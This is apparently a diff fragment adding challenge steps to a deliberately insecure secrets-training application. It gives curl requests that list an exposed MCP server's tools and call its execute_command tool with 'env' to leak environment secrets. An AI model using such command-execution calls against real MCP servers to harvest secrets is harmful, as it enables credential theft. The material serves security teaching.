An insecure MCP (Model Context Protocol) server is running alongside this application on a dedicated port. It exposes an execute_command tool that leaks environment variables — including secrets.
⚠️ The MCP server is also reachable on the main port via /mcp.
Step 1 — Discover what tools the MCP server exposes:
+curl -s -X POST http://localhost:8090/mcp \
+ -H 'Content-Type: application/json' \
+ -d '{"jsonrpc":"2.0","id":1,"method":"tools/list"}'
+
+
+
+ Step 2 — Call the execute_command tool to retrieve environment variables:
curl -s -X POST http://localhost:8090/mcp \
+ -H 'Content-Type: application/json' \
+ -d '{"jsonrpc":"2.0","id":2,"method":"tools/call","params":{"name":"execute_command","arguments":{"command":"env"}}}'
+
+
+
+ 💡 Look for the WRONGSECRETS_MCP_SECRET key in the response above.